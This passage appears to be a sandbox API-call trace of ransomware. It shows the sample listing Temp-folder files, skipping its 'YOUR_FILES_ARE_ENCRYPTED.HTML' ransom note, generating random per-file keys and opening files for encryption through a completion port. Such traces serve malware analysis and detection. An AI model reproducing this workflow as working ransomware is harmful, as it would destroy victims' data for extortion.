param_1=0x19e71a, param_2="%02X" | out: param_1="39") returned 2 [0121.975] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="59") returned 2 [0121.975] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="E9") returned 2 [0121.975] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="5A") returned 2 [0121.975] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="82") returned 2 [0121.975] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="BE") returned 2 [0121.975] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="10") returned 2 [0121.975] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="34") returned 2 [0121.975] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="FD") returned 2 [0121.975] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="F1") returned 2 [0121.975] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="1E") returned 2 [0121.975] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="19") returned 2 [0121.975] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="58") returned 2 [0121.975] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="5C") returned 2 [0121.975] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\aZoLiC1tIka7YX122MG.m4a" [0121.975] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.975] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0121.975] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ec08eb0, ftCreationTime.dwHighDateTime=0x1d7003f, ftLastAccessTime.dwLowDateTime=0xefabd830, ftLastAccessTime.dwHighDateTime=0x1d70a5a, ftLastWriteTime.dwLowDateTime=0xefabd830, ftLastWriteTime.dwHighDateTime=0x1d70a5a, nFileSizeHigh=0x0, nFileSizeLow=0x17010, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="BewCXrre4QC 4ZUq.doc", cAlternateFileName="BEWCXR~1.DOC")) returned 1 [0121.975] StrStrIW (lpFirst="BewCXrre4QC 4ZUq.doc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.975] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc") returned 65 [0121.975] PathFindExtensionW (pszPath="BewCXrre4QC 4ZUq.doc") returned=".doc" [0121.976] lstrlenW (lpString=".doc") returned 4 [0121.976] PathFindExtensionW (pszPath="BewCXrre4QC 4ZUq.doc") returned=".doc" [0121.976] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\bewcxrre4qc 4zuq.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0121.976] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=94224) returned 1 [0121.976] GetProcessHeap () returned 0x600000 [0121.976] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32c81a0 [0121.977] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="AD") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="58") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="32") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="16") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="9C") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="39") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="47") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="AA") returned 2 [0121.977] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="E2") returned 2 [0121.978] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="CF") returned 2 [0121.978] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="1D") returned 2 [0121.978] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="AD") returned 2 [0121.978] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="7E") returned 2 [0121.978] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="DA") returned 2 [0121.978] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="E1") returned 2 [0121.978] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="CC") returned 2 [0121.978] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="18") returned 2 [0121.978] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="DC") returned 2 [0121.978] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="04") returned 2 [0121.978] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="92") returned 2 [0121.978] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="D4") returned 2 [0121.978] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="A7") returned 2 [0121.978] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="F5") returned 2 [0121.978] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="F7") returned 2 [0121.978] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="11") returned 2 [0121.978] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="2B") returned 2 [0121.978] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="9B") returned 2 [0121.978] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="00") returned 2 [0121.978] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="C8") returned 2 [0121.978] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="7C") returned 2 [0121.978] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="6A") returned 2 [0121.978] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="58") returned 2 [0121.979] lstrcpyW (in: lpString1=0x32d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BewCXrre4QC 4ZUq.doc" [0121.979] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x32c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.979] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32c81a0, lpOverlapped=0x32c81a0) returned 1 [0121.979] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29a3af0, ftCreationTime.dwHighDateTime=0x1d6fe9a, ftLastAccessTime.dwLowDateTime=0x9b37bd80, ftLastAccessTime.dwHighDateTime=0x1d707dc, ftLastWriteTime.dwLowDateTime=0x9b37bd80, ftLastWriteTime.dwHighDateTime=0x1d707dc, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="BlyMYHdTUa20mIMn.m4a", cAlternateFileName="BLYMYH~1.M4A")) returned 1 [0121.979] StrStrIW (lpFirst="BlyMYHdTUa20mIMn.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.979] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a") returned 65 [0121.979] PathFindExtensionW (pszPath="BlyMYHdTUa20mIMn.m4a") returned=".m4a" [0121.979] lstrlenW (lpString=".m4a") returned 4 [0121.979] PathFindExtensionW (pszPath="BlyMYHdTUa20mIMn.m4a") returned=".m4a" [0121.979] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\blymyhdtua20mimn.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0121.979] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=1491) returned 1 [0121.979] GetProcessHeap () returned 0x600000 [0121.979] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32f02f8 [0121.981] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="52") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="38") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="2B") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="83") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="8F") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="A5") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="1C") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="C9") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="F8") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="E1") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="37") returned 2 [0121.981] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="B0") returned 2 [0121.981] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="B3") returned 2 [0121.981] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="4C") returned 2 [0121.981] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="CA") returned 2 [0121.981] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="37") returned 2 [0121.981] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="3C") returned 2 [0121.981] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="96") returned 2 [0121.981] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="44") returned 2 [0121.981] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="42") returned 2 [0121.981] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="4B") returned 2 [0121.981] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="B3") returned 2 [0121.981] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="90") returned 2 [0121.981] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="CD") returned 2 [0121.981] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="8F") returned 2 [0121.981] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="A0") returned 2 [0121.981] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="3A") returned 2 [0121.982] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="B9") returned 2 [0121.982] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="15") returned 2 [0121.982] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="5E") returned 2 [0121.982] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="43") returned 2 [0121.982] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4B") returned 2 [0121.982] lstrcpyW (in: lpString1=0x33003ac, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\BlyMYHdTUa20mIMn.m4a" [0121.982] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x32f02f8, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.982] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32f02f8, lpOverlapped=0x32f02f8) returned 1 [0121.982] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda02a670, ftCreationTime.dwHighDateTime=0x1d705e7, ftLastAccessTime.dwLowDateTime=0xcd3d3a10, ftLastAccessTime.dwHighDateTime=0x1d70757, ftLastWriteTime.dwLowDateTime=0xcd3d3a10, ftLastWriteTime.dwHighDateTime=0x1d70757, nFileSizeHigh=0x0, nFileSizeLow=0x1316a, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="c3JoGdCQ_6BFg0J0.doc", cAlternateFileName="C3JOGD~1.DOC")) returned 1 [0121.982] StrStrIW (lpFirst="c3JoGdCQ_6BFg0J0.doc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.982] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc") returned 65 [0121.982] PathFindExtensionW (pszPath="c3JoGdCQ_6BFg0J0.doc") returned=".doc" [0121.982] lstrlenW (lpString=".doc") returned 4 [0121.982] PathFindExtensionW (pszPath="c3JoGdCQ_6BFg0J0.doc") returned=".doc" [0121.982] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\c3jogdcq_6bfg0j0.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0121.983] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=78186) returned 1 [0121.983] GetProcessHeap () returned 0x600000 [0121.983] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3318450 [0121.984] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="87") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="F7") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="4F") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="B1") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="A4") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="93") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="71") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="72") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="2A") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="EA") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="F0") returned 2 [0121.984] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="B1") returned 2 [0121.984] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="42") returned 2 [0121.984] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="BE") returned 2 [0121.985] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="BE") returned 2 [0121.985] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="C3") returned 2 [0121.985] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="6A") returned 2 [0121.985] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="B5") returned 2 [0121.985] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="03") returned 2 [0121.985] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="80") returned 2 [0121.985] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="A9") returned 2 [0121.985] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="80") returned 2 [0121.985] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="1E") returned 2 [0121.985] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="B7") returned 2 [0121.985] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="0C") returned 2 [0121.985] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="AD") returned 2 [0121.985] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="76") returned 2 [0121.985] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="96") returned 2 [0121.985] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="07") returned 2 [0121.985] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="F7") returned 2 [0121.985] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="D7") returned 2 [0121.985] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="40") returned 2 [0121.985] lstrcpyW (in: lpString1=0x3328504, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\c3JoGdCQ_6BFg0J0.doc" [0121.985] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x3318450, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.986] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3318450, lpOverlapped=0x3318450) returned 1 [0121.986] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32a4430, ftCreationTime.dwHighDateTime=0x1d7000d, ftLastAccessTime.dwLowDateTime=0x3bd1ebe0, ftLastAccessTime.dwHighDateTime=0x1d70a7a, ftLastWriteTime.dwLowDateTime=0x3bd1ebe0, ftLastWriteTime.dwHighDateTime=0x1d70a7a, nFileSizeHigh=0x0, nFileSizeLow=0xb17a, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="CnXsg7-nsZMUU.mp3", cAlternateFileName="CNXSG7~1.MP3")) returned 1 [0121.986] StrStrIW (lpFirst="CnXsg7-nsZMUU.mp3", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.986] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3") returned 62 [0121.986] PathFindExtensionW (pszPath="CnXsg7-nsZMUU.mp3") returned=".mp3" [0121.986] lstrlenW (lpString=".mp3") returned 4 [0121.986] PathFindExtensionW (pszPath="CnXsg7-nsZMUU.mp3") returned=".mp3" [0121.986] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0121.986] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cnxsg7-nszmuu.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0121.986] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=45434) returned 1 [0121.986] GetProcessHeap () returned 0x600000 [0121.986] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x33405a8 [0121.988] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="FE") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="BD") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="78") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="BF") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="0E") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="01") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="7B") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="7E") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="10") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="6A") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="E9") returned 2 [0121.988] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="3D") returned 2 [0121.988] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C0") returned 2 [0121.988] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="40") returned 2 [0121.988] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="BD") returned 2 [0121.988] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="EE") returned 2 [0121.988] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="BD") returned 2 [0121.988] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="C6") returned 2 [0121.988] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="B0") returned 2 [0121.988] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="65") returned 2 [0121.988] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="B2") returned 2 [0121.988] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="AD") returned 2 [0121.988] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="85") returned 2 [0121.988] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="EB") returned 2 [0121.988] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="00") returned 2 [0121.988] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="2D") returned 2 [0121.988] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="72") returned 2 [0121.988] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="9E") returned 2 [0121.988] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="AC") returned 2 [0121.988] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="1A") returned 2 [0121.988] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="37") returned 2 [0121.988] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="49") returned 2 [0122.029] lstrcpyW (in: lpString1=0x335065c, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\CnXsg7-nsZMUU.mp3" [0122.029] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x33405a8, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.029] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x33405a8, lpOverlapped=0x33405a8) returned 1 [0122.033] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba60890, ftCreationTime.dwHighDateTime=0x1d6fe66, ftLastAccessTime.dwLowDateTime=0x233b14b0, ftLastAccessTime.dwHighDateTime=0x1d70586, ftLastWriteTime.dwLowDateTime=0x233b14b0, ftLastWriteTime.dwHighDateTime=0x1d70586, nFileSizeHigh=0x0, nFileSizeLow=0x10574, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="cUDTEBhkHU.wav", cAlternateFileName="CUDTEB~1.WAV")) returned 1 [0122.033] StrStrIW (lpFirst="cUDTEBhkHU.wav", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.033] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav") returned 59 [0122.033] PathFindExtensionW (pszPath="cUDTEBhkHU.wav") returned=".wav" [0122.033] lstrlenW (lpString=".wav") returned 4 [0122.033] PathFindExtensionW (pszPath="cUDTEBhkHU.wav") returned=".wav" [0122.033] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\cUDTEBhkHU.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\cudtebhkhu.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.034] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=66932) returned 1 [0122.034] GetProcessHeap () returned 0x600000 [0122.034] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.036] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="B2") returned 2 [0122.036] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="D1") returned 2 [0122.036] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="B0") returned 2 [0122.036] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="DD") returned 2 [0122.036] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="13") returned 2 [0122.037] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="79") returned 2 [0122.037] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="61") returned 2 [0122.037] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="B8") returned 2 [0122.037] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="2C") returned 2 [0122.037] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="D2") returned 2 [0122.037] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="FA") 